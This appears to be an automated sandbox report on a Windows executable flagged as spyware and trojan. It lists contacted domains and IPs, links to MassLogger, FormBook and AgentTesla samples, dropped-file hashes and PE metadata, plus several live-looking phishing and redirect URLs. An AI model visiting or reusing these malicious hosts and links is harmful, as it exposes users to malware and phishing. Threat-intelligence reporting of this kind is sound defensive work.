158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
82.112.184.197	vjaxhpbji.biz	Russian Federation	43267	FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU	false
18.141.10.107	ssbzmoy.biz	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588133
Start date and time:	2025-01-10 21:39:17 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SABXJ1B5c8.exe renamed because original name is a hash value
Original Sample Name:	dff12e1840c3265f14378662e2dbd2e1cad4aa31027ff29056a42964adda27c6.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@20/162@17/9
EGA Information:	Successful, ratio: 87.5%
HCA Information:	Successful, ratio: 62% Number of executed functions: 105 Number of non-executed functions: 43
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchFilterHost.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SearchProtocolHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, VSSVC.exe, WmiApSrv.exe, SearchIndexer.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target armsvc.exe, PID 6760 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
15:40:48	API Interceptor	105622x Sleep call for process: perfhost.exe modified
15:41:01	API Interceptor	197231x Sleep call for process: RegSvcs.exe modified
15:41:03	API Interceptor	11x Sleep call for process: armsvc.exe modified
15:41:25	API Interceptor	200x Sleep call for process: msdtc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	https://glfbanks.com/	Get hash	malicious	HTMLPhisher	Browse
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	9L83v5j083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	y1jQC8Y6bP.exe	Get hash	malicious	MassLogger RAT	Browse
	FILHKLtCw0.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
72.52.178.23	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	fwiwk.biz/tlrsmavbccvnwuep
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	fwiwk.biz/mt
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	forouruguay.net/administrator/index.php
	S7AGd447vH.exe	Get hash	malicious	Amadey	Browse	web.jsonpost.xyz/sj2vMs/index.php
	http://ok.clicknowvip.com	Get hash	malicious	Unknown	Browse	ok.clicknowvip.com/page/bouncy.php?&bpae=GbhGd6c6okx%2Fj3OE4HtYIA68CX9ntwpoDg8E5j%2F4dndljne37pKkD5CpSoioxJaypSWFN%2B%2F7d0pdJjT%2FXeAaZtK52aNdDQePqFw%2BU3EtFy8HVw1CurFHa9v1SNkwpEvnt6kapzzY0jmrtiBi%2Fs0p6Hg1%2BWybmADL5b%2FeGqxaUo%2B3ZgqC1TD15ONDM9JCdp0IuM2%2F0ahg0EaD%2B3knPKHcpKzBm7rSKjhlh7dhj2PtSd9vXMAEGyg4Pdl4F9WFOCMl66J4OK%2FdlD4%2BJGBkAIUa4c04kq%2BFeoq%2FA6%2BDbxRArOdXle6ANZXCYNYN4VzpUDKqHkNwNdhyHvjL72y%2Fvg1F7wOrPTIlFWMmR%2FUJVZi%2FtHCN2VT7pp%2F4kFPLl%2Fsqa62NdgRS%2FlX0MozXYx6%2FHCam5PersGjq21a7r7kzBfCWTg%3D%3D&redirectType=js&inIframe=false&inPopUp=false
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	wxgzshna.biz/qjhbu
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	wxgzshna.biz/jubq
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	wxgzshna.biz/klxaypeiwoubq
	SetupRST.exe	Get hash	malicious	Unknown	Browse	wxgzshna.biz/pmqdwnqfxl
	AsusSetup.exe	Get hash	malicious	Unknown	Browse	wxgzshna.biz/exoigpwxtw

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ssbzmoy.biz	I3LPkQh2an.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	18.141.10.107
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	INV_NE_02_2034388.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	Shipment Notification.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	Request for Quotation.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
knjghuig.biz	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	18.141.10.107
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
przvgke.biz	RFQ_PO N89397-GM7287-Order.bat.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.234.222.138
przvgke.biz	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	172.234.222.143

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	https://glfbanks.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	9L83v5j083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	y1jQC8Y6bP.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	FILHKLtCw0.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
LIQUIDWEBUS	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	72.52.178.23
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2Bp0zWbjdQ23pm6OHkVsvPYDi1myQ0pU4BHbfSebmhjQAIDDVMgAvG7Znw7Pr8RLFA8HEKUDF6j4JiiZ3slfATgGRu3-2BdlWbffHNdZW8UBc7QW6Nxd08b90zhz6-2FhInZrSp1J-2Fh9yU6gsolKI10c6pp1uA-2FrYRI2h9aMn65O5NvFrP-2Fc-2BjlCyvznYBIXNfkBGEguSmRbREbgogGbx0CjJc9kfZpcF-2F4T3W7floa7RxJ5-2BKjbFDYD7FnGxTCmOAt-2BDLn5J0y5KvJMT3qFWKyQo5DJ5ru0B7ksJyMiI6L18xz5XP2GRtxbC7dwfszL4xopys7uMk6wzOFXTrTU9jYi2ZvQxqCtOzUddy1WGVe8msfQF8x3k3Ejw4p6mGzrKR8wOZXnO3uVw5n8j0tNkc31-2F1y7FsWAGygTmAHNV4DJiUXG3-2Foq61jCXRLG1PMMCZ97ToDeMjE9XjfX-2Bb4NXrzqR3tgw-3D-3DwyWG_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcLQ6-2Bsxhj60Ehn0XDEyVD6MCEZ1gioYU2lwgwkCuP2dHRX-2FYdZnQ31dEdwKW37GtXYj9HmZ1F0YrZWwSELmaO5K7noqwYAhu2QGcGqOtQYdjShoJMVTWOe6BTzZXQxib8Y6rd4SX-2BUwZMt-2BbgPIpal6PcS8i4PCSiFy8RF-2Ftt22Wpj713n23BIU6an4375YDP3	Get hash	malicious	Unknown	Browse	64.91.254.36
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2BpuOeo6wXhYyQnN5Dmhl9EwD4jJy2QucAxD5PJ8TFaAtq5-2Fa2JLywFyD22uAsFmhYjQLp65IuicFXReMolU22hvgQ-2B1S2bacC3gnzhuRxI8SAkOsPFFxOcYEiSSZTqVyp3m1OxPmLRrTi1o5-2FZom3YCyV1EUto77Rrvablg0dLCkGGW0ncnt-2B7IgK6LBBZRD7ITvGmpDjZtTYsz0I1qKiLzZdNfmubxarfJC5-2BcEqOw-2Ft-2FbdrugnVMUWHAHioUxjwvqr4QWKZSVt-2BeoNRvP2Adsk-2FRWXyTy-2FNsOG5tm8W5iiSHTNAe6b2ve-2F-2FMif4OPRLC2jk2zIHDBodMQqimJe7S-2B0c0a6VcurrTf-2BSSIJw1siTQylKaBjy96o6v7aWNACMPOJmDH5ybp8Hfg60OUEGx1ZLebRMpxX9k9AP7u40PlQ7YN0etELZUsiTbXY4PcX2P96RfnnTH8k4gdprbyM68BwIDNXqkSpWupXgXawXvLifC6eFYgMzHs5EFbgb5u6HEHo2__tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcL7zwYzcSR3guHWoKhXDu5EQ7SXJZpci4hCmpp1REa7W1YXEAS6JqnE9LrlFK998LZ271LMIRubQetxBOsHxh3FfsHQej0U45DqU0JnGYKUA9waD6Ny-2BL9vchurlVMDvBupSQHaqHAKs87lmzkMbvNLGI-2BMPx7o1UJrTBuhk-2BVx-2FdFVsZL4Uf2HUcBJTS73hyi	Get hash	malicious	Unknown	Browse	67.43.12.232
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2Bp0zWbjdQ23pm6OHkVsvPYDi1myQ0pU4BHbfSebmhjQAIDDVMgAvG7Znw7Pr8RLFA8HEKUDF6j4JiiZ3slfATgGRu3-2BdlWbffHNdZW8UBc7QW6Nxd08b90zhz6-2FhInZrSp1J-2Fh9yU6gsolKI10c6pp1uA-2FrYRI2h9aMn65O5NvFrP-2Fc-2BjlCyvznYBIXNfkBGEguSmRbREbgogGbx0CjJc9kfZpcF-2F4T3W7floa7RxJ5-2BKjbFDYD7FnGxTCmOAt-2BDLn5J0y5KvJMT3qFWKyQo5DJ5ru0B7ksJyMiI6L18xz5XP2GRtxbC7dwfszL4xopys7uMk6wzOFXTrTU9jYi2ZvQxqCtOzUddy1WGVe8msfQF8x3k3Ejw4p6mGzrKR8wOZXnO3uVw5n8j0tNkc31-2F1y7FsWAGygTmAHNV4DJiUXG3-2Foq61jCXRLG1PMMCZ97ToDeMjE9XjfX-2Bb4NXrzqR3tgw-3D-3DrgFz_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcLui8UPBZcrEcBQ64UpH2s9-2FDpSu9qfcgYFRQKTYsD5OOP7p7kgdevUOf60UO0BtzRorOOVdIMlEbf0g38VGeCmtkP8At2J-2BxKEtoZ2O48KqLdUMGUmxH4Esb-2BPRc25uZJoq4Qo0YWw9j31285luIdhLwnz-2B9RfofSABy36tB5aPmDcVeLn5C5N5AJkqjfepa6	Get hash	malicious	Unknown	Browse	67.43.12.232
	https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgBe3vvPhUi3NCctiT7ICCnQ-2FY8o5rhg4URlGJ-2FvsNaBLrMZH2YOUKWM-2BCE-2FXqUBn4SuSDNO43ZHONlcfV0u69WPaY48i3uh3m8lqIzkUcMcKGiml1g6PtP2N9Fq73ADmecSkBDQ1wDesGGu-2Bg3LC1PY31AnFBjTo5itfBoUzfV1y-2FNuV7ub4JBfgFfFwbfDCVw04z2QHPGmvaTuYBRiOw1Tpn5jhya1bpe-2FZKFIvw6DpoIa015fiQnAkr21qCIGDz3kcWaHiPPoAcEbgrIJQtXRwdHoKOAHjnLbHeTfYxioE2jQ-2BKzgO6L-2FLiLt79tmJXX2KYx8D6DTv7nI91sFKT8dXMJM0DazaslrneD4lIUneNyaGARqqUVvrSB7-2BzgxAL-2FuXFyd1qjf-2FnnaV5h661BgCBEWKyZBkPjSGhvc635VlrPtfR5g3T0pDVRqQ8o-2Fg4-3DfYwI_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419PER4av1iPHZIu7rMCH4g59O-2FpVm-2BPXLGfx0fQIDbM830SEyalx7CL7LS5G2wzbNPhsJ2FagkVeT-2FvL4PXhjlJE5YFKw59He2Ja9QVSEHwhUEJm-2BBDxFee6A4QFWAIxMlxI8kis-2B4bFFLDszJAKx313jD-2F4FRd82vUXuacU2lSKZ4Ah2gmv6sbaeoxYrNwq4bbw0e0DJ7EzH1nxfqSXJpTz	Get hash	malicious	Unknown	Browse	67.43.12.232
	https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html	Get hash	malicious	HTMLPhisher	Browse	67.227.180.41
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	72.52.178.23
	armv7l.elf	Get hash	malicious	Unknown	Browse	69.167.187.69
	splsh4.elf	Get hash	malicious	Unknown	Browse	173.199.168.239
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	67.225.198.186

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1
	hZbkP3TJBJ.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	9L83v5j083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	y1jQC8Y6bP.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	FILHKLtCw0.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1
3b5074b1b5d032e5620f69f9f700ff0e	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	HGhGAjCVw5.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	http://diebinjmajbkhhg.top/1.php?s=527	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	149.154.167.220
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	9L83v5j083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1508864
Entropy (8bit):	4.874489202203345
Encrypted:	false
SSDEEP:	24576:9HCAR0iY/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:9CA0LNiXicJFFRGNzj3
MD5:	B6CCC4D7EB894DC512640BD06149CB8F
SHA1:	42DF5903C26FC9F4182B2F2E737E48D52EE46573
SHA-256:	1C1CE5E8DF36B7DAEEC13AA7963573C21CDB3FBE0B04E628E5C5E6E9E96FD78B
SHA-512:	9A491558FF9A53BD4DF8020B4C8144DB1EE061B87CCD87DD24BE2E4E43E42AF763E9D1922B2F7B6809BC274EE1CF7F2F9F1BD9F66C63BC1CE58F2E5C1E4893C2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@.................................K=......................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....`...p.......f..............@...................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Desktop\SABXJ1B5c8.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1445888
Entropy (8bit):	4.810173195982104
Encrypted:	false
SSDEEP:	24576:0xGBcmlV/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:gGy+VLNiXicJFFRGNzj3
MD5:	E5F7971641A9B95E117EDC9226944C29
SHA1:	B4426DB643E9CD99DBED0BEB000B7BC5CF6580BE
SHA-256:	8A7AED34C8C795A416DE237E74A0CA312DA3C359C97D296796FA467C8E5B181E
SHA-512:	95061EDCD4FE7250D36C9CD36172C347D5C7321080E9F6E54B8B45C5F1D3612ED7E172D22618764D46EC0910FA8D019671C7FC4AD5BBEEC069EABB1E6BED3109
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@...........................!.............................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...p...........`..............@...........................................................................................................................................................................................................................................................

Process:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3141
Entropy (8bit):	4.843414277816815
Encrypted:	false
SSDEEP:	48:s2+T292q272nd242zR62E22N2EmR2+82t2u2V222o2E/2oO25w2Eq2EH2c2G222L:TWxPA30
MD5:	FD0C5EB0770B32DF6C4D7BE94BCE61EC
SHA1:	375C3C79B5C15CC993D555C32A26CA96622F7939
SHA-256:	88319AA2E82230A16EB6FDD1D64C9EF2F93904190609E7061F4B3D57248E1F44
SHA-512:	43B5CA61B7ADF724BC75961C6E7484B83055D05F787C138709CE469972066B5B60DDE316F1DF54BBBDF40218F0872AD25E508106B7DB0E60D38E17AD35238B68
Malicious:	false
Reputation:	unknown
Preview:	2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeAuditPrivilege...2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeBackupPrivilege...2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2025-01-10 15:40:47-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeDebugPrivilege...2025-01-10 15:40:47-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2025-01-10 15:40:47-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2025-01-10 15:40:4

Process:	C:\Windows\System32\msdtc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	2313
Entropy (8bit):	5.131925132472158
Encrypted:	false
SSDEEP:	48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786n:Z070s0Y0q0mF7Dm50
MD5:	70249346EBF27BDF3C0D434E9F60BE9F
SHA1:	68FB0660AD175469597EBBFC22A4C453B6EED3A1
SHA-256:	5BDCADB768883EFA9E7F784632213971C3CC972EE54C3D3DDC5FF6616CD5E189
SHA-512:	7E7981BBE7F9B0AAF6EC669D06C5B4B5F78BFF6DE87AF5845ECC957F1D70C7A3A82C3D0702DE56B78099FF03C3AA919440BFB0CE6DB75A16C3D4700F320404DB
Malicious:	false
Reputation:	unknown
Preview:	12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

Process:	C:\Windows\System32\wbengine.exe
File Type:	dBase III DBT, version number 0, next free block index 10240, 1st item "\330e\332e"
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.9463441448509504
Encrypted:	false
SSDEEP:	48:jzVl/iIkT6b8PPqNH7KdaasesPssBSPHDxV/3SoPxPTPfhPkFEE0yp:1l/iI9517v+Dxdzmp
MD5:	9C71B88F4A62B1D773FE54FEC84FCD68
SHA1:	47AB4D56E55D0314690FCCD13A37C374B5569E5B
SHA-256:	1E6AADE5CD81176FF9AC7F900BE2341F4CBFDEFA47027893030A293956F028B9
SHA-512:	25AECECB63D60D4DB1D00AFB4404C12A1B8BEBE99ED29E050C228513AD82EDDCEAB4A4D7431B9DB6E1AED16E75C878D2D3899C18A81DCCDCF0866FD8FC380A57
Malicious:	false
Reputation:	unknown
Preview:	.(..@...@...........................................!....................................e.e.............(......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...............................................................\|.............}.c..........W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P..........e.e................................................................8.B..e.e....19041.1.amd64fre.vb_release.191206-1406.....,.@..e.e...............'"a.-....spp.pdb...........@..e.e.....T.c..i.\.C.s"8@....vssvc.pdb......./.@..e.e....W.p.D.......]....vssapi.pdb......-.@..e.e.....\..Q....T*&.......udfs.pdb........0.@..e.e......B..,`..9..4.....ifsutil.pdb.....-.@..e.e....I:...S%9.`...'.R....uudf.pdb........1.@..e.e...........1$OI"......wbengine.pdb................................

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x675A488A [Thu Dec 12 02:20:58 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x27f70	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

